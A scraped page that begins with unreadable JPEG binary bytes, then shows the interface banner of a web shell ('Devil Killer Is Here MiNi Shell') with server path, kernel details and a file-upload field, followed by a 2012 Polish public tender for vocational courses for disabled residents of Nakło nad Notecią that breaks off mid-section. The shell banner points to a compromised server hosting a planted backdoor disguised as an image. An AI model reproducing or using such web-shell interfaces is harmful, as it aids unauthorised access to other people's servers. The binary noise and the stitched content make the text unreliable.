JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120605/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120605/187332-N-2012.html

<p class="kh_header"><b>Nakło nad Notecią: Przetarg nieograniczony na zorganizowanie i przeprowadzenie kursów/szkoleń w ramach projektu systemowego pn. Aktywna integracja szansą aktywnego rozwoju mieszkańców Powiatu Nakielskiego, realizowanego w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2</b><br>
<b>Numer ogłoszenia: 187332 - 2012; data zamieszczenia: 05.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Nakle nad Notecią , ul. Dąbrowskiego 46, 89-100 Nakło nad Notecią, woj. kujawsko-pomorskie, tel. 52 386 08 04, faks 52 386 08 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pcpr-naklo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na zorganizowanie i przeprowadzenie kursów/szkoleń w ramach projektu systemowego pn. Aktywna integracja szansą aktywnego rozwoju mieszkańców Powiatu Nakielskiego, realizowanego w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie kursów,szkoleń na terenie powiatu nakielskiego w miejscowości Nakło nad Notecią. Kursy,szkolenia są skierowane do osób niepełnosprawnych - Beneficjentów Ostatecznych projektu systemowego realizowanego w ramach środków z Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. pn. Aktywna integracja szansą aktywnego rozwoju mieszkańców Powiatu Nakielskiego.  
1)	Termin kursów,szkoleń: od dnia podpisania umowy do 30.11.2012 r.
2)	Miejsce szkolenia: Szkolenia,kursy w formie wykładów i warsztatów odbędą się na terenie powiatu nakielskiego - miasta Nakło nad Notecią. Uwaga! Zamawiający dopuszcza możliwość przeprowadzenia szkoleń w innej miejscowości niż Nakło nad Notecią, pod warunkiem, że szkolenie będzie odbywać się na terenie powiatu nakielskiego, a wykonawca zapewni (na własny koszt) dojazd każdemu uczestnikowi szkolenia.
3)	Wykonawca zapewnia: 
a)	warunki lokalowe, sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia szkolenia, spełniające wymogi w zakresie BHP i p. poż.;
b)	program szkolenia dostosowany do charakterystyki grupy;
c)	materiały szkoleniowe (w tym jeden dodatkowy do dokumentacji projektu).

Przedmiot zamówienia podzielony zostaje na dwie części:



Część 1:
Liczba uczestników: łącznie 46 osób niepełnosprawnych (w tym z zaburzeniami narządu wzroku, słuchu oraz z ograniczeniami narządów ruchu) w zakresie kursów,szkoleń tj.:

1)	Opiekunka dziecięca, osób starszych i niepełnosprawnych - 145 godzin zajęć dydaktycznych w tym 50 godz. teorii i 95 godz. zajęć praktycznych. Kurs kończy się uzyskaniem zaświadczenia,świadectwa,certyfikatu ukończenia kursu; 2 uczestników,

2)	Kurs komputerowy - 64 godziny (podstawowy, tj. 1. Microsoft Office Word 2007; 2. Internet - Używanie przeglądarki, Korzystanie z sieci, Wydruki z sieci, Komunikacja elektroniczna, Korzystanie z e-maili, Zarządzanie skrzynką pocztową; 3. Obsługa podstawowych funkcji systemu Windows). Kurs kończy się uzyskaniem zaświadczenia,świadectwa,certyfikatu ukończenia kursu; 11 uczestników,

3)	Kurs komputerowy - 64 godziny (średnio-zaawansowany, tj. 1. Microsoft Office Word 2007; 2. Microsoft Office Excel 2007; 3. Microsoft Office Access 2007; 4. Microsoft Office PowerPoint 2007, 5. Internet - Używanie przeglądarki, Korzystanie z sieci, Wydruki z sieci, Komunikacja elektroniczna, Korzystanie z e-maili, Zarządzanie skrzynką pocztową; 6. Obsługa podstawowych funkcji systemu Windows). Kurs kończy się uzyskaniem zaświadczenia,świadectwa,certyfikatu ukończenia kursu; 8 uczestników,

4)	Kurs florystyczny - 80 godzin ( w tym min 70 godz. zajęć praktycznych). Program kursu:, gatunki i pielęgnacja roślin, teoria florystyki oraz materiałoznawstwo, zasady kompozycji oraz teoria barw, organizacja miejsca pracy, w tym prowadzenie własnej działalności gospodarczej, BHP w zawodzie florysty, zajęcia praktyczne. Zajęcia praktyczne odbywać się będą z wykorzystaniem kwiatów ciętych, sztucznych oraz innych elementów dekoracyjnych w tym: układanie wiązanek okolicznościowych, ślubnych, pogrzebowych, świątecznych oraz układanie: kompozycji z kwiatów ciętych, koszy kwiatowych. Koszt kursu obejmuje wszelkie materiały szkoleniowe i florystyczne. Kurs kończy się uzyskaniem zaświadczenia,świadectwa,certyfikatu ukończenia kursu; 6 uczestników

5)	Kurs obsługi wózków widłowych (akumulatorowych, spalinowych) - 2-4 tygodnie (minimum 67 godzin), kurs obejmuje: podstawy prawne, transport wewnątrzzakładowy, budowa i działanie podzespołów, obsługa i eksploatacja, elektrotechnika, bhp, ppoż., pierwsza pomoc, jazda wózkami. Kurs obejmuje również szkolenie na wymianę butli gazowych LPG w wózku widłowym. Kurs kończy się uzyskaniem świadectwa ukończenia kursu 
i zaświadczenia Urzędu Dozoru Technicznego, uprawniającym do obsługi wózków widłowych; 6 uczestników,

6)	Kurs masażu - 70 godzin, kurs obejmuje: 1. Teoria masażu i techniki masażu klasycznego; 2. Anatomia i fizjologia - poznanie mechanizmu działania masażu i jego fizjologicznego wpływu na człowieka; 3. Masaż klasyczny: - zajęcia praktyczne, 
- nauka technik masażu, - masaż całościowy ciała, - masaż relaksacyjny, - masaż odchudzający; 4. Masaż leczniczy: - zajęcia praktyczne, - kształcenie umiejętności wykonania poszczególnych ruchów w masażu; 5. Masaż sportowy: - zajęcia praktyczne, - masaż sportowy w procesie odnowy biologicznej, - główne zasady i warunki wykonywania masażu sportowego, - rodzaje masażu sportowego; 6. Inne techniki: - zajęcia praktyczne, - poznanie dodatkowych technik masażu klasycznego. Kurs kończy się uzyskaniem zaświadczenia,świadectwa,certyfikatu ukończenia kursu; 6 uczestników;

7)	Kurs księgowo - kadrowy (podstawowy) - 100 godzin. Szkolenie przygotowujące do prowadzenia dokumentacji kadrowo - płacowej i zarządzania biurem, obejmujące zagadnienia: podstawy prawne i organizacyjne księgowości, konta księgowe, system prawa podatkowego w Polsce, formy rozliczania się podatników z Urzędem Skarbowym, zastosowanie zasad rachunkowości, podstawowe zasady ewidencji na kontach księgowych,  Zakładowy Plan Kont, organizacja obiegu dokumentów w firmie, sprawozdawczość finansowa, omówienie przykładowych dokumentów w księgowości, zestawienie obrotów i sald, bilans, rachunek przepływów środków pieniężnych, analiza wskaźnikowa, System Ubezpieczeń Społecznych, Ubezpieczenie zdrowotne, zgłoszenie i inne deklaracje do ZUS, rozliczenia z ZUS, Prawo Pracy i umowy cywilnoprawne,   dokumentacja pracownicza od CV do Świadectwa pracy, dane osobowe i ich przetwarzanie, potrącenia obligatoryjne i fakultatywne, podstawowa dokumentacja płacowa, naliczanie wynagrodzeń. Kurs kończy się uzyskaniem zaświadczenia/ świadectwa/certyfikatu ukończenia kursu; 2 uczestników;

8)	Kurs księgowo - kadrowy (średnio-zaawansowany) - 120 godzin. Szkolenie przygotowujące do prowadzenia dokumentacji kadrowo - płacowej i zarządzania biurem. Obsługa programu kadrowo - płacowego Gratyfikant, Rachmistrz, Symfonia, Płatnik, a także maszyn i urządzeń biurowych. Kurs kończy się uzyskaniem zaświadczenia, świadectwa,certyfikatu ukończenia kursu; 2 uczestników;

9)	Kurs sprzedawcy z obsługą kasy fiskalnej. Tematyka zajęć: organizacja działalności handlowej, towar jako przedmiot handlu, sztuka sprzedawania, dokumentacja handlowa, wystawianie rachunków i faktur, etyka zawodu sprzedawcy, kultura obsługi klienta, obsługa kas fiskalnych, ćwiczenia z zakresu sprzedaży. Cykl szkolenia na kursie obejmuje: 23 godz. Teoretycznych, 67 godz. zajęć ćwiczeniowych. Kurs kończy się uzyskaniem zaświadczenia,świadectwa, certyfikatu ukończenia kursu - 1 uczestnik.

Część 2: 
Kurs prawa jazdy kat. B.
Liczba uczestników: 8 osób niepełnosprawnych. 
Wykonawca w cenie oferty zapewnia opłatę lekarza oraz pierwszą opłatę egzaminacyjną w Wojewódzkim Ośrodku Ruchu Drogowego. 
Kurs musi obyć się zgodnie z zasadami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2005r. Nr 217, poz.1834 ze zm.).


Po zakończeniu kursu Jednostka Szkoleniowa zobowiązana jest dostarczyć w terminie 7 dni do Powiatowego Centrum Pomocy Rodzinie w Nakle nad Notecią  potwierdzone za zgodność z oryginałem:
specyfikację kategorii poniesionych wydatków i kwot tych wydatków,
kserokopię  dziennika  zajęć edukacyjnych  zawierającego tematy  zajęć  edukacyjnych i wymiar  godzin  oraz  listę  obecności  z  własnoręcznymi podpisami uczestników kursu (mogą stanowić one załącznik do dziennika zajęć),
potwierdzenie  odbioru  materiałów szkoleniowych przez uczestników,    
kserokopie  zaświadczeń lub  innych dokumentów  potwierdzających ukończenie kursu,
kserokopię  rejestru wydanych  zaświadczeń  lub  innych  dokumentów   potwierdzających ukończenie kursu,
imienny wykaz osób, które nie ukończyły kursu,
kserokopię  protokołu egzaminacyjnego,
kopie ankiet służących do oceny kursu.

Wyłoniony wykonawca (najpóźniej do dnia zawarcia umowy) zobowiązany jest do dostarczenia zamawiającemu:
1) program kursu, który powinien zawierać w szczególności:
nazwę kursu,
czas   trwania  i  sposób  organizacji  kursu (liczba  godzin  zajęć  w  każdym  dniu odbywania zajęć kursu),
2) harmonogram zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę 
w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę 
w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu składanego przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu i dokumentów, składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami o odpowiednich kwalifikacjach niezbędnych do prawidłowej realizacji szkolenia objętego przedmiotem zamówienia, z zastrzeżeniem iż wykładowcy przewidziani do prowadzenia zajęć teoretycznych i praktycznych muszą posiadać minimum roczne doświadczenie zawodowe w pracy dydaktycznej, przez którą należy rozumieć pracę w jednostkach szkolących, szkołach, uczelniach, instytucjach i innych placówkach polegającą na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, warsztatów, konferencji itp. Wymagania dotyczące kadry szkoleniowej musi spełniać każda osoba wskazana przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu składanego przez wykonawcę 
w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	formularz oferty - załącznik nr 1 do SIWZ;
2.	pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę w treści niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:
1)	podwykonawców oraz zakresu prac im powierzonych,
2)	pracowników wskazanych w ofercie Wykonawcy, pod warunkiem zachowania wskazanych 
w ofercie kwalifikacji zawodowych, 
3)	zmiany stawki podatku VAT,
4)	zmiany ilości uczestników poszczególnych kursów, w przypadku rezygnacji uczestnika z kursu i konieczności dokonania nowego naboru uczestnika, pod warunkiem, że Zamawiający dokona wyboru kursu dla nowego uczestnika spośród kursów określonych w ofercie. Cena jednostkowa kursu nie ulegnie zmianie mimo zwiększenia liczby uczestników kursu.
na warunkach określonych w specyfikacji istotnych warunków zamówienia i ogłoszeniu 
o zamówieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiat.nakielski.lo.pl/?cid=294<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Nakle nad Notecią
ul. Dąbrowskiego 46
89-100 Nakło nad Notecią.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2012 godzina 08:45, miejsce: Powiatowe Centrum Pomocy Rodzinie w Nakle nad Notecią
ul. Dąbrowskiego 46
89-100 Nakło nad Notecią
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu systemowego pn. Aktywna integracja szansą aktywnego rozwoju mieszkańców Powiatu Nakielskiego, realizowanego w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zorganizaowanie i przeprowdzenie 9 kursów, szkoleń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie kursów/szkoleń na terenie powiatu nakielskiego w miejscowości Nakło nad Notecią. Kursy/szkolenia są skierowane do osób niepełnosprawnych - Beneficjentów Ostatecznych projektu systemowego realizowanego w ramach środków z Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. pn. Aktywna integracja szansą aktywnego rozwoju mieszkańców Powiatu Nakielskiego.  
1)	Termin kursów/szkoleń: od dnia podpisania umowy do 30.11.2012 r.
2)	Miejsce szkolenia: Szkolenia/kursy w formie wykładów i warsztatów odbędą się na terenie powiatu nakielskiego - miasta Nakło nad Notecią. Uwaga! Zamawiający dopuszcza możliwość przeprowadzenia szkoleń w innej miejscowości niż Nakło nad Notecią, pod warunkiem, że szkolenie będzie odbywać się na terenie powiatu nakielskiego, a wykonawca zapewni (na własny koszt) dojazd każdemu uczestnikowi szkolenia.
3)	Wykonawca zapewnia: 
a)	warunki lokalowe, sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia szkolenia, spełniające wymogi w zakresie BHP i p. poż.;
b)	program szkolenia dostosowany do charakterystyki grupy;
c)	materiały szkoleniowe (w tym jeden dodatkowy do dokumentacji projektu).

Przedmiot zamówienia podzielony zostaje na dwie części:



Część 1:
Liczba uczestników: łącznie 46 osób niepełnosprawnych (w tym z zaburzeniami narządu wzroku, słuchu oraz z ograniczeniami narządów ruchu) w zakresie kursów/szkoleń tj.:

1)	Opiekunka dziecięca, osób starszych i niepełnosprawnych - 145 godzin zajęć dydaktycznych w tym 50 godz. teorii i 95 godz. zajęć praktycznych. Kurs kończy się uzyskaniem zaświadczenia/świadectwa/certyfikatu ukończenia kursu; 2 uczestników,

2)	Kurs komputerowy - 64 godziny (podstawowy, tj. 1. Microsoft Office Word 2007; 2. Internet - Używanie przeglądarki, Korzystanie z sieci, Wydruki z sieci, Komunikacja elektroniczna, Korzystanie z e-maili, Zarządzanie skrzynką pocztową; 3. Obsługa podstawowych funkcji systemu Windows). Kurs kończy się uzyskaniem zaświadczenia/świadectwa/certyfikatu ukończenia kursu; 11 uczestników,

